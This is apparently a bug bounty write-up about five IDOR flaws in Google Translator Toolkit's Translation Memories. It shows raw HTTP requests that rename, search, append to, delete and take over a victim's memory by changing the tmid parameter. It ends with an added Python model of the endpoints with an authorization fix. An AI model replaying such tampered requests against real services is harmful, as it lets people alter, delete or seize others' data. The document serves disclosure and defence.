Hello,
Shailesh here!
There is a module named "Translation Toolkit" in https://translate.google.com, and I found that a sub-module named "Translation Memories" was fully vulnerable to IDOR vulnerabilities!
I found 5 IDORs in Translation Memories.
1. IDOR to change name of victim's Translation Memory :
An attacker was able to change the name of the victim's translation memory because there was a lack of proper ACLs at this endpoint.
HTTP Request :
POST /toolkit/utmname?hl=en HTTP/1.1
Host: translate.google.com
..
security_token=AKrFfvIvi97LGuNHa3w_vpTZyWwPszzm5g%3A1467183119818&tmid=8a73972848d860ed&tmname=renamed_by_attacker
2. IDOR to search from victim's Translation Memory :
An attacker was able to search from the victim's translation memory because there was a lack of proper ACLs at this endpoint too.
HTTP Request :
POST /toolkit/gettm HTTP/1.1
Host: translate.google.com
...
hl=en&src=a&sl=en&tl=sq&tmids=1e0cd01b8a7bde44&thld=0&mofmt=true
3. IDOR to replace or add .tmx file into victim's Translation Memory :
You can find more about the .tmx file format here. I used such a .tmx file to add data into the victim's Translation Memory. I was able to replace or combine .tmx data into the victim's translation memory because of a lack of proper ACLs on uploading a .tmx file into a Translation Memory.
HTTP Request :
POST /toolkit/tmappend?hl=en HTTP/1.1
Host: translate.google.com
..
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="security_token"
AKrFfvKLf60q11l-TlCENLERqMD0KI9LAA:1447909448118
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tmid"
07a132fa949ac969
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tloc"; filename="my_memory (1).tmx"
Content-Type: application/octet-stream
<XML>...
------WebKitFormBoundarymGTgNNHKz4FAMIdY--
4. IDOR to delete victim's Translation Memory :
Yeah!! There were no ACLs at this endpoint either, so an attacker was able to delete the victim's translation memory using a simple IDOR.
HTTP Request :
POST /toolkit/deletetm HTTP/1.1
Host: translate.google.com
..
hl=en&tmids=850b211b36c39a1e&security_token=AKrFfvKaPs2JVm4aGg8xLSyE_-o1RMc-Uw%3A1467184220688
5. IDOR to takeover victim's Translation Memory :
There were no ACLs on sharing a Translation Memory with a user, so an attacker was able to share the victim's Translation Memory with himself and become an owner of that particular Translation Memory.
HTTP Request :
POST /toolkit/utminfo HTTP/1.1
Host: translate.google.com
Connection: keep-alive
Content-Length: 396
...
hl=en&tmid=1e0cd01b8a7bde44&acl=[{"access":7,"me":true,"email":"victim.dummy.4594@gmail.com"},{"access":7,"email":"attacker.dummy.4594@gmail.com"},{"email":"@gmail.com","access":7,"caa":false,"new":true}]&ntfy=true&copy=false&security_token=xxxxxx:144786375312
In short, I was able to modify the victim's Translation Memory.
In every request, tmid (or tmids) was the vulnerable parameter!
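All five findings share one root cause: each endpoint trusted the client-supplied tmid and never checked whether the logged-in user was allowed to touch that memory. The following is an added example, not code from the original post or from Google's Translator Toolkit, of a minimal server-side model of the five endpoints with that object-level authorization check in place. The store, the access bits, the function names (kept equal to the endpoint names for readability), AccessDenied and the sample e-mail addresses from the write-up are all assumptions made for illustration.

```python
from dataclasses import dataclass, field

# Assumed access bits; 7 (READ|WRITE|MANAGE) mirrors the "access":7 value
# seen in the utminfo request body.
READ, WRITE, MANAGE = 1, 2, 4
FULL = READ | WRITE | MANAGE


class AccessDenied(Exception):
    """Raised instead of acting on a tmid the caller may not touch."""


@dataclass
class TranslationMemory:
    tmid: str
    name: str
    owner: str                                    # owner's e-mail
    acl: dict = field(default_factory=dict)       # e-mail -> access bits
    segments: list = field(default_factory=list)  # (source, target) pairs


STORE: dict = {}   # constructed in-memory store standing in for the backend


def _effective_access(tm, caller):
    return FULL if tm.owner == caller else tm.acl.get(caller, 0)


def _authorize(caller, tmid, needed):
    """The check the original endpoints lacked: resolve the tmid, then verify
    the caller (taken from the session, never from the request body) holds the
    needed bits. Missing and forbidden look identical to the client, so tmids
    cannot be enumerated through the error."""
    tm = STORE.get(tmid)
    if tm is None or _effective_access(tm, caller) & needed != needed:
        raise AccessDenied(f"tmid {tmid}: access denied")
    return tm


def utmname(caller, tmid, tmname):            # rename (finding 1)
    tm = _authorize(caller, tmid, WRITE)
    tm.name = tmname
    return tm.name


def gettm(caller, tmids, query):             # search (finding 2)
    hits = []
    for tmid in tmids:                        # every tmid is checked on its own
        tm = _authorize(caller, tmid, READ)
        hits.extend(t for s, t in tm.segments if query.lower() in s.lower())
    return hits


def tmappend(caller, tmid, segments):        # .tmx upload (finding 3)
    tm = _authorize(caller, tmid, WRITE)
    tm.segments.extend(segments)
    return len(tm.segments)


def deletetm(caller, tmids):                 # delete (finding 4)
    for tmid in tmids:                        # authorize all before deleting any
        _authorize(caller, tmid, FULL)
    for tmid in tmids:
        del STORE[tmid]
    return len(tmids)


def utminfo(caller, tmid, acl_entries):      # share (finding 5)
    """Needs MANAGE, and nobody can grant more access than they hold, which
    closes the share-with-yourself takeover."""
    tm = _authorize(caller, tmid, MANAGE)
    mine = _effective_access(tm, caller)
    new_acl = {}
    for entry in acl_entries:
        email, access = entry["email"], int(entry["access"])
        if email == tm.owner:
            continue                          # owner is implicit, not ACL-editable
        if access & ~mine:
            raise AccessDenied("cannot grant more access than you hold")
        new_acl[email] = access
    tm.acl = new_acl
    return dict(tm.acl)


def attempt(call):
    """Run one replayed request and report whether the check let it through."""
    try:
        call()
        return "allowed"
    except AccessDenied:
        return "denied"


def demo():
    """Victim owns a memory; the attacker replays each endpoint with the victim's tmid."""
    STORE.clear()
    victim, attacker = "victim.dummy.4594@gmail.com", "attacker.dummy.4594@gmail.com"
    tmid = "1e0cd01b8a7bde44"
    STORE[tmid] = TranslationMemory(tmid, "my_memory", victim,
                                    segments=[("hello", "pershendetje")])
    results = {
        "rename": attempt(lambda: utmname(attacker, tmid, "renamed_by_attacker")),
        "search": attempt(lambda: gettm(attacker, [tmid], "hello")),
        "append": attempt(lambda: tmappend(attacker, tmid, [("bye", "mirupafshim")])),
        "delete": attempt(lambda: deletetm(attacker, [tmid])),
        "share": attempt(lambda: utminfo(attacker, tmid, [{"email": attacker, "access": 7}])),
    }
    # A legitimate share by the owner still works and grants only what was given.
    utminfo(victim, tmid, [{"email": attacker, "access": READ}])
    results["owner_share"] = gettm(attacker, [tmid], "hello")
    return results
```

The point of `_authorize` is that the tmid is only a lookup key; the decision is made against the caller's identity from the session. `utminfo` additionally caps granted access at the caller's own level, so even a user with share rights cannot hand themselves the owner's bits.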
That's all ;)
Because the data exposed was of low sensitivity, I received a combined bounty of $3133.7 from Google.
Thank you for reading! :-)
-Shailesh Suthar